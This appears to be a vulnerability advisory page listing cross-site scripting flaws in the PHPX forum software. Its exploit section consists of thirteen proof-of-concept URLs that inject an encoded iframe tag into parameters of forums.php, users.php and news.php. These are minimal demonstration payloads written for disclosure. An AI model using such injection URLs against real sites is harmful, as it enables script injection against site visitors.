• info
• discussion
• exploit
• solution
• references

PHPX Multiple Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

http://www.example.com/forums.php?forum_id=[VID]&limit=25%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=15%3Ciframe%3E
http://www.example.com/users.php?action=&limit=100%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=search&search_id=[VID]&limit=25%3E%3Ciframe%3E
http://www.example.com/users.php?action=email&user_id=%3E%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
http://www.example.com/news.php?news_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E